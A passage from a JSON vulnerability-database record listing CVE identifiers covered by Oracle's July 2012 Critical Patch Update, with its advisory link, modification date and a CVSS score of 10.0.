"CVE-2012-1675", "CVE-2011-4358", "CVE-2012-3135", "CVE-2012-3123", "CVE-2012-3126", "CVE-2011-3607", "CVE-2012-3129", "CVE-2012-0031", "CVE-2012-1731", "CVE-2012-3110", "CVE-2011-0419", "CVE-2012-1732", "CVE-2012-1729", "CVE-2012-0563", "CVE-2012-1771", "CVE-2011-4885", "CVE-2012-3124", "CVE-2012-3118", "CVE-2012-3134", "CVE-2012-1730", "CVE-2012-3131", "CVE-2012-1745", "CVE-2012-1746", "CVE-2012-1689", "CVE-2012-1743", "CVE-2012-1687", "CVE-2011-2699", "CVE-2012-1733", "CVE-2012-3130", "CVE-2012-1770", "CVE-2012-3127", "CVE-2012-1737", "CVE-2012-1752", "CVE-2012-1720", "CVE-2012-1757", "CVE-2012-1734", "CVE-2012-0053", "CVE-2012-3111", "CVE-2012-1717", "CVE-2012-3107", "CVE-2012-0021", "CVE-2012-1713", "CVE-2012-1769", "CVE-2012-1765", "CVE-2012-3119", "CVE-2012-1749", "CVE-2012-3121", "CVE-2012-1748", "CVE-2011-3368", "CVE-2012-3128", "CVE-2012-1756", "CVE-2012-3106", "CVE-2012-1718", "CVE-2012-1736", "CVE-2012-1758", "CVE-2011-3192", "CVE-2012-1727", "CVE-2012-3122", "CVE-2012-1760", "CVE-2012-1759", "CVE-2012-3108", "CVE-2012-3112", "CVE-2012-3115", "CVE-2012-0540", "CVE-2012-1764", "CVE-2012-3114", "CVE-2012-1768", "CVE-2012-1739", "CVE-2012-2749", "CVE-2012-3109", "CVE-2012-1772", "CVE-2012-3113", "CVE-2012-1728", "CVE-2012-1724", "CVE-2012-1753", "CVE-2012-1735", "CVE-2012-3125", "CVE-2012-1762", "CVE-2012-1715", "CVE-2012-1754", "CVE-2012-3116", "CVE-2011-3562", "CVE-2012-1750", "CVE-2008-4609"], "modified": "2013-08-09T00:00:00", "id": "ORACLE:CPUJUL2012-392727", "href": "https://www.oracle.com/security-alerts/cpujul2012.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}